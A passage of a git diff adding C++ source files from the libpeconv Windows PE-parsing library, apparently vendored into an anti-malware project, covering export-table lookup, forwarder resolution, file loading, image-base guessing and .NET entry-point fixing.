std::transform(dllName.begin(), dllName.end(), dllName.begin(), tolower); + return dllName + "." + funcName; +} + +ExportedFunc::ExportedFunc(std::string libName, std::string funcName, DWORD funcOrdinal) +{ + this->libName = ExportedFunc::formatName(libName); + this->funcName = funcName; + this->funcOrdinal = funcOrdinal; + this->isByOrdinal = false; +} + +ExportedFunc::ExportedFunc(std::string libName, DWORD funcOrdinal) +{ + this->libName = ExportedFunc::formatName(libName); + this->funcOrdinal = funcOrdinal; + this->isByOrdinal = true; +} + +ExportedFunc::ExportedFunc(const ExportedFunc& other) +{ + this->libName = other.libName; + this->funcName = other.funcName; + this->funcOrdinal = other.funcOrdinal; + this->isByOrdinal = other.isByOrdinal; +} + +ExportedFunc::ExportedFunc(const std::string &forwarderName) +{ + this->libName = get_dll_shortname(forwarderName); + std::string func_name_str = get_func_name(forwarderName); + if (func_name_str.length() < 2) { + this->funcOrdinal = -1; + this->funcName = ""; + this->isByOrdinal = false; +#ifdef _DEBUG + std::cerr << "Invalid function data" << std::endl; +#endif + return; + } + if (is_ordinal_string(func_name_str)) { + // it is an ordinal in a string form, i.e.: "COMBASE.#110" + this->funcOrdinal = peconv::ordinal_string_to_val(func_name_str); + this->isByOrdinal = true; + this->funcName = ""; + //std::cout << "[O] Adding forwarded func: " << forwarderName << " parsed: " << this->toString() << std::endl; + } else { + this->funcName = func_name_str; + this->isByOrdinal = false; + this->funcOrdinal = 0; + //std::cout << "[N] Adding forwarded func:" << this->toString() << std::endl; + } +} + +std::string ExportedFunc::formatName(std::string name) +{ + if (name.length() == 0 || name.length() == 0) { + return ""; + } + std::transform(name.begin(), name.end(), name.begin(), tolower); + return name; +} + +std::string ExportedFunc::toString() const +{ + if (!isValid()) { + return "[Invalid func]"; + } + std::stringstream stream; + stream << this->libName; + stream << "."; + if (!this->isByOrdinal) { + stream << this->funcName; + stream << " "; + } + stream << ordinal_to_string(this->funcOrdinal); + return stream.str(); +} + +std::string ExportedFunc::nameToString() const +{ + if (!isValid()) { + return ""; + } + if (this->isByOrdinal) { + return ordinal_to_string(this->funcOrdinal); + } + return this->funcName; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/exports_lookup.cpp b/ai_anti_malware/libpeconv/libpeconv/src/exports_lookup.cpp new file mode 100644 index 0000000..66d01f0 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/exports_lookup.cpp @@ -0,0 +1,193 @@ +#include "peconv/exports_lookup.h" + +#include + +/* +typedef struct _IMAGE_EXPORT_DIRECTORY { + DWORD Characteristics; + DWORD TimeDateStamp; + WORD MajorVersion; + WORD MinorVersion; + DWORD Name; + DWORD Base; + DWORD NumberOfFunctions; + DWORD NumberOfNames; + DWORD AddressOfFunctions; // RVA from base of image + DWORD AddressOfNames; // RVA from base of image + DWORD AddressOfNameOrdinals; // RVA from base of image +} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY; +*/ + +#ifndef TO_LOWERCASE +#define TO_LOWERCASE(c1) c1 = (c1 <= 'Z' && c1 >= 'A') ? c1 = (c1 - 'A') + 'a': c1; +#endif + +bool is_wanted_func(LPSTR curr_name, LPSTR wanted_name) +{ + if (curr_name == NULL || wanted_name == NULL) return false; + + size_t wanted_name_len = strlen(wanted_name); + size_t curr_name_len = strlen(curr_name); + + if (curr_name_len != wanted_name_len) return false; + + for (size_t i = 0; i < wanted_name_len; i++) { + char c1 = curr_name[i]; + char c2 = wanted_name[i]; + TO_LOWERCASE(c1); + TO_LOWERCASE(c2); + if (c1 != c2) return false; + } + return true; +} + +bool is_ordinal(IMAGE_EXPORT_DIRECTORY *exp, LPSTR func_name) +{ + ULONGLONG base = exp->Base; + ULONGLONG max_ord = base + exp->NumberOfFunctions; + ULONGLONG name_ptr_val = (ULONGLONG)func_name; + if (name_ptr_val >= base && name_ptr_val < max_ord) { + return true; + } + return false; +} + +FARPROC get_export_by_ord(PVOID modulePtr, IMAGE_EXPORT_DIRECTORY* exp, DWORD wanted_ordinal) +{ + SIZE_T functCount = exp->NumberOfFunctions; + DWORD funcsListRVA = exp->AddressOfFunctions; + DWORD ordBase = exp->Base; + + //go through names: + for (DWORD i = 0; i < functCount; i++) { + DWORD* funcRVA = (DWORD*)(funcsListRVA + (BYTE*) modulePtr + i * sizeof(DWORD)); + BYTE* fPtr = (BYTE*) modulePtr + (*funcRVA); //pointer to the function + DWORD ordinal = ordBase + i; + if (ordinal == wanted_ordinal) { + if (peconv::forwarder_name_len(fPtr) > 1) { + std::cerr << "[!] Forwarded function: ["<< wanted_ordinal << " -> "<< fPtr << "] cannot be resolved!" << std::endl; + return NULL; // this function is forwarded, cannot be resolved + } + return (FARPROC) fPtr; //return the pointer to the found function + } + } + return NULL; +} + +size_t peconv::get_exported_names(PVOID modulePtr, std::vector &names_list) +{ + IMAGE_EXPORT_DIRECTORY* exp = peconv::get_export_directory((HMODULE) modulePtr); + if (exp == 0) return 0; + + SIZE_T namesCount = exp->NumberOfNames; + DWORD funcNamesListRVA = exp->AddressOfNames; + + //go through names: + SIZE_T i = 0; + for (i = 0; i < namesCount; i++) { + DWORD* nameRVA = (DWORD*)(funcNamesListRVA + (BYTE*) modulePtr + i * sizeof(DWORD)); + + LPSTR name = (LPSTR)(*nameRVA + (BYTE*) modulePtr); + if (IsBadReadPtr(name, 1)) break; // this shoudld not happen. maybe the PE file is corrupt? + + names_list.push_back(name); + } + return i; +} + +//WARNING: doesn't work for the forwarded functions. +FARPROC peconv::get_exported_func(PVOID modulePtr, LPSTR wanted_name) +{ + IMAGE_EXPORT_DIRECTORY* exp = peconv::get_export_directory((HMODULE) modulePtr); + if (exp == NULL) return NULL; + + SIZE_T namesCount = exp->NumberOfNames; + + DWORD funcsListRVA = exp->AddressOfFunctions; + DWORD funcNamesListRVA = exp->AddressOfNames; + DWORD namesOrdsListRVA = exp->AddressOfNameOrdinals; + + if (is_ordinal(exp, wanted_name)) { +#ifdef _DEBUG + std::cerr << "[*] Getting function by ordinal" << std::endl; +#endif + const DWORD ordinal = MASK_TO_DWORD((ULONG_PTR)wanted_name); + return get_export_by_ord(modulePtr, exp, ordinal); + } + if (IsBadReadPtr(wanted_name, 1)) { + std::cerr << "[-] Invalid pointer to the name" << std::endl; + return NULL; + } + + //go through names: + for (SIZE_T i = 0; i < namesCount; i++) { + DWORD* nameRVA = (DWORD*)(funcNamesListRVA + (BYTE*) modulePtr + i * sizeof(DWORD)); + WORD* nameIndex = (WORD*)(namesOrdsListRVA + (BYTE*) modulePtr + i * sizeof(WORD)); + DWORD* funcRVA = (DWORD*)(funcsListRVA + (BYTE*) modulePtr + (*nameIndex) * sizeof(DWORD)); + + LPSTR name = (LPSTR)(*nameRVA + (BYTE*) modulePtr); + BYTE* fPtr = (BYTE*) modulePtr + (*funcRVA); //pointer to the function + + if (!is_wanted_func(name, wanted_name)) { + continue; //this is not the function we are looking for + } + if (forwarder_name_len(fPtr) > 1) { + std::cerr << "[!] Forwarded function: ["<< name << " -> "<< fPtr << "] cannot be resolved!" << std::endl; + return NULL; // this function is forwarded, cannot be resolved + } + return (FARPROC) fPtr; //return the pointer to the found function + } + //function not found + std::cerr << "Function not found!" << std::endl; + return NULL; +} + +FARPROC peconv::export_based_resolver::resolve_func(LPSTR lib_name, LPSTR func_name) +{ + HMODULE libBasePtr = LoadLibraryA(lib_name); + if (libBasePtr == NULL) { + std::cerr << "Could not load the library!" << std::endl; + return NULL; + } + + FARPROC hProc = get_exported_func(libBasePtr, func_name); + + if (hProc == NULL) { +#ifdef _DEBUG + if (!IsBadReadPtr(func_name, 1)) { + std::cerr << "[!] Cound not get the function: "<< func_name <<" from exports!" << std::endl; + } else { + std::cerr << "[!] Cound not get the function: "<< MASK_TO_DWORD((ULONG_PTR)func_name) <<" from exports!" << std::endl; + } + std::cerr << "[!] Falling back to the default resolver..." <Name); + if (IsBadReadPtr(module_name, 1)) { + return NULL; + } + size_t len = peconv::forwarder_name_len((BYTE*) module_name); + if (len > 1) { + return module_name; + } + return NULL; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/exports_mapper.cpp b/ai_anti_malware/libpeconv/libpeconv/src/exports_mapper.cpp new file mode 100644 index 0000000..2b38e55 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/exports_mapper.cpp @@ -0,0 +1,269 @@ +#include "peconv/exports_mapper.h" +#include +#include + + +using namespace peconv; + +void ExportsMapper::print_va_to_func(std::stringstream &stream) const +{ + std::map>::const_iterator itr; + + for (itr = va_to_func.begin(); itr != va_to_func.end(); ++itr) { + + stream << std::hex << itr->first << " :\n"; + + std::set::const_iterator itr2; + const std::set &funcs = itr->second; + + for (itr2 = funcs.begin(); itr2 != funcs.end(); ++itr2) { + stream << "\t" << itr2->toString() << "\n"; + } + } +} + +void ExportsMapper::print_func_to_va(std::stringstream &stream) const +{ + std::map::const_iterator itr; + for (itr = func_to_va.begin(); itr != func_to_va.end(); ++itr) { + stream << itr->first.toString() << " : " + << std::hex << itr->second << "\n"; + } +} + +ULONGLONG rebase_va(ULONGLONG va, ULONGLONG currBase, ULONGLONG targetBase) +{ + if (currBase == targetBase) { + return va; + } + ULONGLONG rva = va - (ULONGLONG) currBase; + return rva + targetBase; +} + +size_t ExportsMapper::make_ord_lookup_tables( + PVOID modulePtr, + size_t moduleSize, + std::map &va_to_ord + ) +{ + IMAGE_EXPORT_DIRECTORY* exp = peconv::get_export_directory((HMODULE) modulePtr); + if (exp == NULL) return 0; + + SIZE_T functCount = exp->NumberOfFunctions; + DWORD funcsListRVA = exp->AddressOfFunctions; + DWORD ordBase = exp->Base; + + //go through names: + for (DWORD i = 0; i < functCount; i++) { + DWORD* recordRVA = (DWORD*)(funcsListRVA + (BYTE*) modulePtr + i * sizeof(DWORD)); + if (*recordRVA == 0) { +#ifdef _DEBUG + std::cout << ">>> Skipping 0 function address at RVA:" << std::hex << (BYTE*)recordRVA - (BYTE*)modulePtr<< "(ord)\n"; +#endif + //skip if the function RVA is 0 (empty export) + continue; + } + if (!peconv::validate_ptr(modulePtr, moduleSize, recordRVA, sizeof(DWORD))) { + break; + } + DWORD ordinal = ordBase + i; + va_to_ord[recordRVA] = ordinal; + } + return functCount; +} + +size_t ExportsMapper::resolve_forwarders(const ULONGLONG va, ExportedFunc &currFunc) +{ + size_t resolved = 0; + //resolve forwarders of this function (if any): + std::map>::iterator fItr = forwarders_lookup.find(currFunc); + if (fItr != forwarders_lookup.end()) { + //printf("[+] Forwarders (%d):\n", fItr->second.size()); + std::set::iterator sItr; + for (sItr = fItr->second.begin(); sItr != fItr->second.end(); ++sItr) { + //printf("-> %s\n", sItr->c_str()); + associateVaAndFunc(va, *sItr); + resolved++; + } + } + return resolved; +} + +bool ExportsMapper::add_forwarded(ExportedFunc &currFunc, DWORD callRVA, PBYTE modulePtr, size_t moduleSize) +{ + PBYTE fPtr = modulePtr + callRVA; + if (!peconv::validate_ptr(modulePtr, moduleSize, fPtr, 1)) { + return false; + } + if (peconv::forwarder_name_len(fPtr) < 1) { + return false; //not forwarded + } + std::string forwardedFunc = format_dll_func((char*)fPtr); + if (forwardedFunc.length() == 0) { + return false; //not forwarded + } + + ExportedFunc forwarder(forwardedFunc); + if (!forwarder.isValid()) { +#ifdef _DEBUG + std::cerr << "Skipped invalid forwarder" << std::endl; +#endif + return false; + } + forwarders_lookup[forwarder].insert(currFunc); + + if (func_to_va[forwarder] != 0) { + ULONGLONG va = func_to_va[forwarder]; + associateVaAndFunc(va, currFunc); + } + return true; +} + +DWORD get_ordinal(PDWORD recordPtr, std::map &va_to_ord) +{ + std::map::iterator ord_itr = va_to_ord.find(recordPtr); + if (ord_itr == va_to_ord.end()) { + //ordinal not found + return -1; + } + DWORD ordinal = ord_itr->second; + va_to_ord.erase(ord_itr); + return ordinal; +} + +bool ExportsMapper::add_to_maps(ULONGLONG va, ExportedFunc &currFunc) +{ + associateVaAndFunc(va, currFunc); + resolve_forwarders(va, currFunc); + return true; +} + +bool is_valid_export_table(IMAGE_EXPORT_DIRECTORY* exp, HMODULE modulePtr, const size_t module_size) +{ + if (exp == nullptr) return false; + + const SIZE_T namesCount = exp->NumberOfNames; + const SIZE_T funcCount = exp->NumberOfFunctions; + + const DWORD funcsListRVA = exp->AddressOfFunctions; + const DWORD funcNamesListRVA = exp->AddressOfNames; + const DWORD namesOrdsListRVA = exp->AddressOfNameOrdinals; + + for (DWORD i = 0; i < funcCount; i++) { + DWORD* recordRVA = (DWORD*)(funcsListRVA + (BYTE*)modulePtr + i * sizeof(DWORD)); + if (*recordRVA == 0) { + //skip if the function RVA is 0 (empty export) + continue; + } + if (!peconv::validate_ptr(modulePtr, module_size, recordRVA, sizeof(DWORD))) { + return false; + } + } + + for (SIZE_T i = 0; i < namesCount; i++) { + DWORD* nameRVA = (DWORD*)(funcNamesListRVA + (BYTE*)modulePtr + i * sizeof(DWORD)); + WORD* nameIndex = (WORD*)(namesOrdsListRVA + (BYTE*)modulePtr + i * sizeof(WORD)); + if ((!peconv::validate_ptr(modulePtr, module_size, nameRVA, sizeof(DWORD))) + || (!peconv::validate_ptr(modulePtr, module_size, nameIndex, sizeof(WORD)))) + { + return false; + } + DWORD* funcRVA = (DWORD*)(funcsListRVA + (BYTE*)modulePtr + (*nameIndex) * sizeof(DWORD)); + if (!peconv::validate_ptr(modulePtr, module_size, funcRVA, sizeof(DWORD))) + { + return false; + } + } + return true; +} + +ExportsMapper::ADD_FUNC_RES ExportsMapper::add_function_to_lookup(HMODULE modulePtr, ULONGLONG moduleBase, size_t moduleSize, ExportedFunc &currFunc, DWORD callRVA) +{ + if (add_forwarded(currFunc, callRVA, (BYTE*)modulePtr, moduleSize)) { +#ifdef _DEBUG + char* fPtr = (char*)modulePtr + callRVA; + std::cout << "FWD " << currFunc.toString() << " -> " << fPtr << "\n"; +#endif + return ExportsMapper::RES_FORWARDED; + } + + ULONGLONG callVa = callRVA + moduleBase; + if (!peconv::validate_ptr((BYTE*)moduleBase, moduleSize, (BYTE*)callVa, sizeof(ULONGLONG))) { + // this may happen when the function was forwarded and it is already filled +#ifdef _DEBUG + std::cout << "Validation failed: " << currFunc.toString() << "\n"; +#endif + return ExportsMapper::RES_INVALID; + } + //not forwarded, simple case: + add_to_maps(callVa, currFunc); + return ExportsMapper::RES_MAPPED; +} + +size_t ExportsMapper::add_to_lookup(std::string moduleName, HMODULE modulePtr, ULONGLONG moduleBase) +{ + IMAGE_EXPORT_DIRECTORY* exp = get_export_directory(modulePtr); + if (exp == NULL) { + return 0; + } + size_t module_size = peconv::get_image_size(reinterpret_cast(modulePtr)); + if (!is_valid_export_table(exp, modulePtr, module_size)) { + return 0; + } + std::string dllName = get_dll_shortname(moduleName); + this->dll_shortname_to_path[dllName] = moduleName; + + std::map va_to_ord; + size_t functCount = make_ord_lookup_tables(modulePtr, module_size, va_to_ord); + + //go through names: + + size_t forwarded_ctr = 0; + SIZE_T namesCount = exp->NumberOfNames; + + DWORD funcsListRVA = exp->AddressOfFunctions; + DWORD funcNamesListRVA = exp->AddressOfNames; + DWORD namesOrdsListRVA = exp->AddressOfNameOrdinals; + + size_t mapped_ctr = 0; + + for (SIZE_T i = 0; i < namesCount; i++) { + DWORD* nameRVA = (DWORD*)(funcNamesListRVA + (BYTE*) modulePtr + i * sizeof(DWORD)); + WORD* nameIndex = (WORD*)(namesOrdsListRVA + (BYTE*) modulePtr + i * sizeof(WORD)); + DWORD* funcRVA = (DWORD*)(funcsListRVA + (BYTE*) modulePtr + (*nameIndex) * sizeof(DWORD)); + if (*funcRVA == 0) { +#ifdef _DEBUG + std::cout << ">>> Skipping 0 function address at RVA:" << std::hex << (BYTE*)funcRVA - (BYTE*)modulePtr << "(name)\n"; +#endif + //skip if the function RVA is 0 (empty export) + continue; + } + + LPSTR name = (LPSTR)(*nameRVA + (BYTE*) modulePtr); + if (!peconv::validate_ptr(modulePtr, module_size, name, sizeof(char))) break; + + DWORD funcOrd = get_ordinal(funcRVA, va_to_ord); + DWORD callRVA = *funcRVA; + ExportedFunc currFunc(dllName, name, funcOrd); + + int res = add_function_to_lookup(modulePtr, moduleBase, module_size, currFunc, callRVA); + if (res == ExportsMapper::RES_FORWARDED) forwarded_ctr++; + if (res == ExportsMapper::RES_MAPPED) mapped_ctr++; + } + //go through unnamed functions exported by ordinals: + std::map::iterator ord_itr = va_to_ord.begin(); + for (;ord_itr != va_to_ord.end(); ++ord_itr) { + + DWORD* funcRVA = ord_itr->first; + DWORD callRVA = *funcRVA; + ExportedFunc currFunc(dllName, ord_itr->second); + + int res = add_function_to_lookup(modulePtr, moduleBase, module_size, currFunc, callRVA); + if (res == ExportsMapper::RES_FORWARDED) forwarded_ctr++; + if (res == ExportsMapper::RES_MAPPED) mapped_ctr++; + } +#ifdef _DEBUG + std::cout << "Finished exports parsing, mapped: "<< mapped_ctr << " forwarded: " << forwarded_ctr << std::endl; +#endif + return mapped_ctr; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/file_util.cpp b/ai_anti_malware/libpeconv/libpeconv/src/file_util.cpp new file mode 100644 index 0000000..68aecca --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/file_util.cpp @@ -0,0 +1,147 @@ +#include "peconv/file_util.h" +#include "peconv/buffer_util.h" + +#include +#ifdef _DEBUG + #include +#endif + +//load file content using MapViewOfFile +peconv::ALIGNED_BUF peconv::load_file(IN const char *filename, OUT size_t &read_size) +{ + HANDLE file = CreateFileA(filename, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0); + if(file == INVALID_HANDLE_VALUE) { +#ifdef _DEBUG + std::cerr << "Could not open file!" << std::endl; +#endif + return nullptr; + } + HANDLE mapping = CreateFileMapping(file, 0, PAGE_READONLY, 0, 0, 0); + if (!mapping) { +#ifdef _DEBUG + std::cerr << "Could not create mapping!" << std::endl; +#endif + CloseHandle(file); + return nullptr; + } + BYTE *dllRawData = (BYTE*) MapViewOfFile(mapping, FILE_MAP_READ, 0, 0, 0); + if (!dllRawData) { +#ifdef _DEBUG + std::cerr << "Could not map view of file" << std::endl; +#endif + CloseHandle(mapping); + CloseHandle(file); + return nullptr; + } + size_t r_size = GetFileSize(file, 0); + if (read_size != 0 && read_size <= r_size) { + r_size = read_size; + } + if (IsBadReadPtr(dllRawData, r_size)) { + std::cerr << "[-] Mapping of " << filename << " is invalid!" << std::endl; + UnmapViewOfFile(dllRawData); + CloseHandle(mapping); + CloseHandle(file); + return nullptr; + } + peconv::ALIGNED_BUF localCopyAddress = peconv::alloc_aligned(r_size, PAGE_READWRITE); + if (localCopyAddress != nullptr) { + memcpy(localCopyAddress, dllRawData, r_size); + read_size = r_size; + } else { + read_size = 0; +#ifdef _DEBUG + std::cerr << "Could not allocate memory in the current process" << std::endl; +#endif + } + UnmapViewOfFile(dllRawData); + CloseHandle(mapping); + CloseHandle(file); + return localCopyAddress; +} + +//load file content using ReadFile +peconv::ALIGNED_BUF peconv::read_from_file(IN const char *in_path, IN OUT size_t &read_size) +{ + HANDLE file = CreateFileA(in_path, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0); + if (file == INVALID_HANDLE_VALUE) { +#ifdef _DEBUG + std::cerr << "Cannot open the file for reading!" << std::endl; +#endif + return nullptr; + } + size_t r_size = static_cast(GetFileSize(file, 0)); + if (read_size != 0 && read_size <= r_size) { + r_size = read_size; + } + PBYTE buffer = peconv::alloc_pe_buffer(r_size, PAGE_READWRITE); + if (buffer == nullptr) { +#ifdef _DEBUG + std::cerr << "Allocation has failed!" << std::endl; +#endif + return nullptr; + } + DWORD out_size = 0; + if (!ReadFile(file, buffer, r_size, &out_size, nullptr)) { +#ifdef _DEBUG + std::cerr << "Reading failed!" << std::endl; +#endif + peconv::free_pe_buffer(buffer, r_size); + buffer = nullptr; + read_size = 0; + } else { + read_size = r_size; + } + CloseHandle(file); + return buffer; +} + +//save the given buffer into a file +bool peconv::dump_to_file(IN const char *out_path, IN PBYTE dump_data, IN size_t dump_size) +{ + if (!out_path || !dump_data || !dump_size) return false; + + HANDLE file = CreateFileA(out_path, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); + if (file == INVALID_HANDLE_VALUE) { +#ifdef _DEBUG + std::cerr << "Cannot open the file for writing!" << std::endl; +#endif + return false; + } + DWORD written_size = 0; + bool is_dumped = false; + if (WriteFile(file, dump_data, (DWORD) dump_size, &written_size, nullptr)) { + is_dumped = true; + } +#ifdef _DEBUG + else { + std::cerr << "Failed to write to the file : " << out_path << std::endl; + } +#endif + CloseHandle(file); + return is_dumped; +} + +//free the buffer allocated by load_file/read_from_file +void peconv::free_file(IN peconv::ALIGNED_BUF buffer) +{ + peconv::free_aligned(buffer); +} + +std::string peconv::get_file_name(IN const std::string str) +{ + size_t found = str.find_last_of("/\\"); + if (found == std::string::npos) { + return str; + } + return str.substr(found + 1); +} + +std::string peconv::get_directory_name(IN const std::string str) +{ + size_t found = str.find_last_of("/\\"); + if (found == std::string::npos) { + return ""; + } + return str.substr(0, found); +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/find_base.cpp b/ai_anti_malware/libpeconv/libpeconv/src/find_base.cpp new file mode 100644 index 0000000..3dad3a0 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/find_base.cpp @@ -0,0 +1,125 @@ +#include +#include +#include +#include +#include +#include + +namespace peconv { + + class CollectCodeRelocs : public RelocBlockCallback + { + public: + CollectCodeRelocs(BYTE *pe_buffer, size_t buffer_size, IN bool _is64bit, OUT std::set &_relocs) + : RelocBlockCallback(_is64bit), relocs(_relocs), + peBuffer(pe_buffer), bufferSize(buffer_size) + { + codeSec = getCodeSection(peBuffer, bufferSize); + } + + virtual bool processRelocField(ULONG_PTR relocField) + { + if (!codeSec) return false; + + ULONGLONG reloc_addr = (relocField - (ULONGLONG)peBuffer); + const bool is_in_code = (reloc_addr >= codeSec->VirtualAddress) && (reloc_addr < codeSec->Misc.VirtualSize); + if (!is64bit && !is_in_code) { + // in case of 32 bit PEs process only the relocations form the code section + return true; + } + ULONGLONG rva = 0; + if (is64bit) { + ULONGLONG* relocateAddr = (ULONGLONG*)((ULONG_PTR)relocField); + rva = (*relocateAddr); + //std::cout << std::hex << (relocField - (ULONGLONG)peBuffer) << " : " << rva << std::endl; + } + else { + DWORD* relocateAddr = (DWORD*)((ULONG_PTR)relocField); + rva = ULONGLONG(*relocateAddr); + //std::cout << std::hex << (relocField - (ULONGLONG)peBuffer) << " : " << rva << std::endl; + } + relocs.insert(rva); + return true; + } + + static PIMAGE_SECTION_HEADER getCodeSection(BYTE *peBuffer, size_t bufferSize) + { + size_t sec_count = peconv::get_sections_count(peBuffer, bufferSize); + for (size_t i = 0; i < sec_count; i++) { + PIMAGE_SECTION_HEADER hdr = peconv::get_section_hdr(peBuffer, bufferSize, i); + if (!hdr) break; + if (hdr->VirtualAddress == 0 || hdr->SizeOfRawData == 0) { + continue; + } + if (hdr->Characteristics & IMAGE_SCN_MEM_EXECUTE) { + return hdr; + } + } + return nullptr; + } + + protected: + std::set &relocs; + PIMAGE_SECTION_HEADER codeSec; + + BYTE *peBuffer; + size_t bufferSize; + }; +} + +ULONGLONG peconv::find_base_candidate(IN BYTE* modulePtr, IN size_t moduleSize) +{ + if (moduleSize == 0) { + moduleSize = peconv::get_image_size((const BYTE*)modulePtr); + } + if (moduleSize == 0) return 0; + + bool is64 = peconv::is64bit(modulePtr); + std::set relocs; + peconv::CollectCodeRelocs callback(modulePtr, moduleSize, is64, relocs); + if (!peconv::process_relocation_table(modulePtr, moduleSize, &callback)) { + return 0; + } + if (relocs.size() == 0) { + return 0; + } + + PIMAGE_SECTION_HEADER hdr = peconv::CollectCodeRelocs::getCodeSection(modulePtr, moduleSize); + if (!hdr) { + return 0; + } + const ULONGLONG mask = ~ULONGLONG(0xFFFF); + std::mapbase_candidates; + + std::set::iterator itr = relocs.begin(); + + for (itr = relocs.begin(); itr != relocs.end(); ++itr) { + const ULONGLONG guessed_base = (*itr) & mask; + std::map::iterator found = base_candidates.find(guessed_base); + if (found == base_candidates.end()) { + base_candidates[guessed_base] = 0; + } + base_candidates[guessed_base]++; + } + ULONGLONG most_freqent = 0; + size_t max_freq = 0; + std::map::iterator mapItr; + for (mapItr = base_candidates.begin(); mapItr != base_candidates.end(); ++mapItr) { + if (mapItr->second >= max_freq) { + most_freqent = mapItr->first; + max_freq = mapItr->second; + } + } + for (itr = relocs.begin(); itr != relocs.end(); ++itr) { + ULONGLONG first = *itr; + ULONGLONG first_base = first & mask; + if (first_base > most_freqent) { + break; + } + ULONGLONG delta = most_freqent - first_base; + if (delta < moduleSize) { + return first_base; + } + } + return 0; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/fix_dot_net_ep.cpp b/ai_anti_malware/libpeconv/libpeconv/src/fix_dot_net_ep.cpp new file mode 100644 index 0000000..26054e2 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/fix_dot_net_ep.cpp @@ -0,0 +1,144 @@ +#include "fix_dot_net_ep.h" +#include + +#include +#include + +class ListImportNames : public peconv::ImportThunksCallback +{ +public: + ListImportNames(BYTE* _modulePtr, size_t _moduleSize, std::map &name_to_addr) + : ImportThunksCallback(_modulePtr, _moduleSize), nameToAddr(name_to_addr) + { + } + + virtual bool processThunks(LPSTR lib_name, ULONG_PTR origFirstThunkPtr, ULONG_PTR firstThunkPtr) + { + if (this->is64b) { + IMAGE_THUNK_DATA64* desc = reinterpret_cast(origFirstThunkPtr); + ULONGLONG* call_via = reinterpret_cast(firstThunkPtr); + return processThunks_tpl(lib_name, desc, call_via, IMAGE_ORDINAL_FLAG64); + } + IMAGE_THUNK_DATA32* desc = reinterpret_cast(origFirstThunkPtr); + DWORD* call_via = reinterpret_cast(firstThunkPtr); + return processThunks_tpl(lib_name, desc, call_via, IMAGE_ORDINAL_FLAG32); + } + +protected: + template + bool processThunks_tpl(LPSTR lib_name, T_IMAGE_THUNK_DATA* desc, T_FIELD* call_via, T_FIELD ordinal_flag) + { + DWORD call_via_rva = static_cast((ULONG_PTR)call_via - (ULONG_PTR)this->modulePtr); +#ifdef _DEBUG + std::cout << "via RVA: " << std::hex << call_via_rva << " : "; +#endif + bool is_by_ord = (desc->u1.Ordinal & ordinal_flag) != 0; + if (!is_by_ord) { + PIMAGE_IMPORT_BY_NAME by_name = (PIMAGE_IMPORT_BY_NAME)((ULONGLONG)modulePtr + desc->u1.AddressOfData); + LPSTR func_name = reinterpret_cast(by_name->Name); +#ifdef _DEBUG + std::cout << "name: " << func_name << std::endl; +#endif + nameToAddr[func_name] = call_via_rva; + } + return true; + } + + std::map &nameToAddr; +}; + +DWORD find_corexemain(BYTE *buf, size_t buf_size) +{ + std::map name_to_addr; + ListImportNames callback(buf, buf_size, name_to_addr); + if (!peconv::process_import_table(buf, buf_size, &callback)) return 0; + + std::map::iterator found = name_to_addr.find("_CorExeMain"); + if (found != name_to_addr.end()) return found->second; + + found = name_to_addr.find("_CorDllMain"); + if (found != name_to_addr.end()) return found->second; + + return 0; +} + +BYTE* search_jump(BYTE *buf, size_t buf_size, const DWORD cor_exe_main_thunk, const ULONGLONG img_base) +{ + // search the jump pattern, i.e.: + //JMP DWORD NEAR [0X402000] : FF 25 00204000 + const size_t jmp_size = 2; + const BYTE jmp_pattern[jmp_size] = { 0xFF, 0x25 }; + + const size_t arg_size = sizeof(DWORD); + if ((jmp_size + arg_size) > buf_size) { + return nullptr; + } + const size_t end_offset = buf_size - (jmp_size + arg_size); + + for (size_t i = end_offset; // search backwards + (i + 1) != 0; // this is unsigned comparison, so we cannot do: i >= 0 + i--) // go back by one BYTE + { + if (buf[i] == jmp_pattern[0] && buf[i + 1] == jmp_pattern[1]) { // JMP + DWORD* addr = (DWORD*)(&buf[i + jmp_size]); + DWORD rva = static_cast((*addr) - img_base); + if (rva == cor_exe_main_thunk) { +#ifdef _DEBUG + std::cout << "Found call to _CorExeMain\n"; +#endif + return buf + i; + } + else { + std::cout << "[!] Mismatch: " << std::hex << rva << " vs _CorExeMain: " << cor_exe_main_thunk << std::endl; + } + } + } + return nullptr; +} + +bool fix_dot_net_ep(BYTE *pe_buffer, size_t pe_buffer_size) +{ + if (!pe_buffer) return false; + + if (peconv::is64bit(pe_buffer)) { + //64bit .NET files have EP=0 + peconv::update_entry_point_rva(pe_buffer, 0); + return true; + } + + DWORD ep_rva = peconv::get_entry_point_rva(pe_buffer); + std::cout << "[*] This is a .NET payload and may require Enty Point corection. Current EP: " << std::hex << ep_rva << "\n"; + + PIMAGE_SECTION_HEADER sec_hdr = peconv::get_section_hdr(pe_buffer, pe_buffer_size, 0); + if (!sec_hdr) return false; + + BYTE *sec_ptr = pe_buffer + sec_hdr->VirtualAddress; + if (!peconv::validate_ptr(pe_buffer, pe_buffer_size, sec_ptr, sec_hdr->SizeOfRawData)) { + return false; + } + ULONGLONG img_base = peconv::get_image_base(pe_buffer); + DWORD cor_exe_main_thunk = find_corexemain(pe_buffer, pe_buffer_size); + if (!cor_exe_main_thunk) { + return false; + } + BYTE* jump_ptr = search_jump(sec_ptr, sec_hdr->SizeOfRawData, cor_exe_main_thunk, img_base); + if (jump_ptr == nullptr) return false; + + size_t offset = jump_ptr - pe_buffer; + peconv::update_entry_point_rva(pe_buffer, static_cast(offset)); + std::cout << "[*] Found possible Entry Point: " << std::hex << offset << std::endl; + return true; +} + +bool is_dot_net(BYTE *pe_buffer, size_t pe_buffer_size) +{ + if (!pe_buffer) return false; + + IMAGE_DATA_DIRECTORY* dotnet_ptr = peconv::get_directory_entry(pe_buffer, 